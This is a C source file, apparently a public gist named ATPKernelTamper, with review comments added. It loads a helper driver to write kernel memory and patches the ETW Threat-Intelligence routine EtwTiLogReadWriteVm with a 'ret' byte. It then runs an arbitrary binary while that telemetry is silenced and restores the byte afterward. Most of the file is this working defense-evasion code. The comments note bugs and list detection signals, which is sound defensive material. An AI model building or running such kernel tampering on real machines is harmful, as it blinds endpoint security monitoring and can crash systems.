@b4rtik
Last active August 14, 2022 22:39
// Byte pattern that main() searches for inside the copied ntoskrnl.exe image
// (see searchSign() call in main); the patch site is computed relative to the
// position where this pattern is found.
unsigned char signature[] = { 0x41 ,0x83 ,0xf9 ,0x10 ,0xb8 ,0x00 ,0x00 ,0x0c ,0x00 ,0x41 ,0xb8 ,0x00 ,0x00 ,0x03 ,0x00 };
// Bytes subtracted from the pattern's offset to reach the byte that gets patched.
// NOTE(review): the pattern and this delta appear to be tied to one kernel build
// (main() prints a warning that a wrong version detection leads to a BSOD); there
// is no check in main() that the pattern was actually found before the delta is
// applied.
int backoffset = 76;
// Number of bytes of kernel memory read out starting at the kernel image base
// (0x1000000 = 16 MiB) and searched for the pattern.
SIZE_T searchlen = 0x1000000;
// One entry of the loaded-module list returned by
// NtQuerySystemInformation(SystemModuleInformation). main() reads only
// ImageBase, OffsetToFileName and FullPathName from it.
typedef struct _RTL_PROCESS_MODULE_INFORMATION
{
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;          // kernel-mode base address of the module image
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;  // byte offset into FullPathName of the file-name part
UCHAR FullPathName[256];  // NUL-terminated path; main() compares the tail with "ntoskrnl.exe"
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
// Header of the SystemModuleInformation buffer: a count followed by that many
// RTL_PROCESS_MODULE_INFORMATION entries. Modules[1] is the classic trailing
// variable-length array idiom; main() indexes it up to NumberOfModules.
typedef struct _RTL_PROCESS_MODULES
{
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
// Overwrites a single byte at kernelbaseaddress + offset in kernel memory through
// the ghDriver read/write helpers and returns the byte that was there before.
//
// Parameters:
//   kernelbaseaddress  base of the kernel image (ImageBase from the module list)
//   pml4               value from find_directory_base(); presumably the page
//                      table base the driver helpers use to translate the
//                      virtual address - not shown here, verify in the helpers
//   offset             byte offset from the base to the patch site
//   function_name      label used only in the printed progress lines
//   value              byte written to the patch site
// Returns the original byte, or 0x0 if any driver read/write fails.
// NOTE(review): 0x0 is also a valid original byte, so a caller cannot tell
// "failed" from "the byte was 0x00"; main() feeds this return value straight
// into the restore call, so a failure here makes the restore write 0x00.
BYTE patchFunction(LPVOID kernelbaseaddress, uintptr_t pml4,int offset, const char* function_name, BYTE value)
{
BYTE bres;
BYTE bori;
BYTE patch = value;
uintptr_t size = 0;   // unused
uintptr_t p = (uintptr_t)kernelbaseaddress + offset;
// NOTE(review): %#x expects unsigned int but p is uintptr_t; on 64-bit this is
// a format/argument mismatch and the printed address is not reliable.
printf("[+] %s address: %#x\n", function_name, p);
// First read; its result and bres are discarded (bres is re-read below).
BOOL result = read_virtual_memory(ghDriver, pml4, p, &bres, 1);
// Save the original byte so the caller can restore it later.
if(!read_virtual_memory(ghDriver, pml4, p, &bori, 1))
{
return 0x0;
}
// Write the replacement byte into kernel memory.
if (!write_virtual_memory(ghDriver, pml4, p, &patch, 1))
{
return 0x0;
}
// Read back to confirm the write; the original byte is returned only if this
// read-back succeeds (even though the write itself already happened).
if (read_virtual_memory(ghDriver, pml4, p, &bres, 1))
{
printf("[+] %s new value: %#x old value: %#x\n\n", function_name, bres, bori);
}
else
{
return 0x0;
}
return bori;
}
// Convenience overload: patch with 0xc3 (the x86 `ret` opcode), so the patched
// routine returns as soon as execution reaches the patch site. Returns the
// original byte, or 0x0 on failure, exactly like the five-argument version.
BYTE patchFunction(LPVOID kernelbaseaddress, uintptr_t pml4, int offset, const char* function_name)
{
return patchFunction(kernelbaseaddress, pml4, offset, function_name, 0xc3);
}
// Entry point. Flow: validate the argument and the target binary, run the
// version check, load the helper driver (registered as gpcidrv64), locate
// ntoskrnl.exe in the loaded-module list, copy the first searchlen bytes of the
// kernel image into a user buffer, search it for `signature`, patch one byte at
// (match - backoffset) in the routine labelled EtwTiLogReadWriteVm, run argv[1]
// via system(), write the original byte back, then unload and unregister the
// driver.
//
// Exit codes: -1 on VirtualAlloc / NtQuerySystemInformation failure; 0 on every
// other path, including argument, file and driver errors.
//
// NOTE(review): from a detection standpoint the host-visible events are the
// driver's service registration and load, the kernel-memory read/write traffic
// through that driver, and the child process spawned by system(); the registry
// cleanup at the end does not undo what was already logged.
int main(int argc, char* argv[])
{
printf("====== ATPKernelTamper ======\n");
if(argc != 2)
{
printf("[-] Usage: ATPKernelTamper.exe binary\n");
return 0;
}
// FileExists() is defined elsewhere in the file.
if(!FileExists(argv[1]))
{
printf("[-] Binary file not found\n");
return 0;
}
// Version check (defined elsewhere); the warning below exists because a wrong
// match makes the pattern/backoffset pair patch the wrong bytes.
so_check();
printf("[+] Please make sure your version is detected correctly. Incorrect version detection will leads to BSOD.\n");
printf("[+] Press any key to proceed.\n");
getchar();
// NOTE(review): not NULL-checked; freed only on the successful-read path below
// and leaked on every other path (no ntoskrnl match, read failure).
VOID* buffer = malloc(searchlen);
if (!LoadDriver())
{
printf("[-] Could not load driver, maybe lack of permission?\n");
return 0;
}
// On InitDriver failure the driver is unloaded and its registry entry removed;
// the same cleanup runs at the end of the successful path.
if (!InitDriver()) {
printf("[-] Could not get a handle to driver, is driver loaded?\n");
Dl_UnloadDriver(L"gpcidrv64");
Dl_RemoveDriverFromRegistry(L"gpcidrv64");
return 0;
}
NTSTATUS status;
ULONG i;
PRTL_PROCESS_MODULES ModuleInfo;
// NOTE(review): this 1 MiB block is released only on the query-failure path
// below, never on the success path.
ModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 1024 * 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // Allocate memory for the module list
if (!ModuleInfo)
{
printf("\nUnable to allocate memory for module list (%d)\n", GetLastError());
return -1;
}
// Fixed-size query with ReturnLength = NULL: a module list larger than 1 MiB
// simply fails here instead of being retried with a bigger buffer.
if (!NT_SUCCESS(status = NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, 1024 * 1024, NULL)))
{
printf("\nError: Unable to query module list (%#x)\n", status);
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return -1;
}
// Find the kernel image by comparing the file-name part of each module path.
for (i = 0; i < ModuleInfo->NumberOfModules; i++)
{
if (strcmp((char *)(ModuleInfo->Modules[i].FullPathName + ModuleInfo->Modules[i].OffsetToFileName), "ntoskrnl.exe") == 0)
{
// NOTE(review): %#x with a pointer argument is a format mismatch on 64-bit.
printf("[+] Kernel address: %#x\n", ModuleInfo->Modules[i].ImageBase);
// Page-table base handed to the driver helpers; find_directory_base() is
// defined elsewhere.
uintptr_t pml4 = find_directory_base(ghDriver);
printf("\n");
// Copy searchlen bytes of the kernel image into the user-mode buffer.
BOOL result = read_virtual_memory(ghDriver, pml4, (uintptr_t)ModuleInfo->Modules[i].ImageBase, buffer, searchlen);
if(result)
{
// NOTE(review): searchSign()'s not-found return value is never checked, so a
// missing pattern still produces a patch site; offset is DWORD and backoffset
// is int, so offset < backoffset wraps rather than going negative.
DWORD offset = searchSign((unsigned char*)buffer, signature, sizeof(signature));
// buffer is freed here but the pointer stays in scope; a second matching
// module entry would reuse it in the read above.
free(buffer);
printf("[*] Offset %d\n", offset - backoffset);
// Default overload writes 0xc3 (`ret`); the original byte is kept for the
// restore below. Judging by the name, EtwTiLogReadWriteVm is the kernel's ETW
// Threat-Intelligence logging routine for read/write-VM events; the patch site
// is derived from the byte pattern, not from an export, so whether it is the
// routine's entry is not visible here.
BYTE EtwTiLogReadWriteVmOri = patchFunction(ModuleInfo->Modules[i].ImageBase, pml4, offset - backoffset, "EtwTiLogReadWriteVm");
printf("[+] Run your command now\n");
// Runs the user-supplied binary through the shell while the patch is in place.
int retCode = system(argv[1]);
printf("\n\n");
printf("[+] Execution finished with exit code: %d\n", retCode);
printf("[+] Proceed to restore previous state.\n");
// Write the saved byte back. If the first patchFunction call failed it returned
// 0x0, and that is what gets written here (see the note on patchFunction).
patchFunction(ModuleInfo->Modules[i].ImageBase, pml4, offset - backoffset, "EtwTiLogReadWriteVm", EtwTiLogReadWriteVmOri);
}
else
{
printf("[*] Errore reading kernel memory \n");
}
}
}
// Tear down: close the driver handle, unload the driver and remove its
// registration.
CloseHandle(ghDriver);
Dl_UnloadDriver(L"gpcidrv64");
Dl_RemoveDriverFromRegistry(L"gpcidrv64");
return 0;
}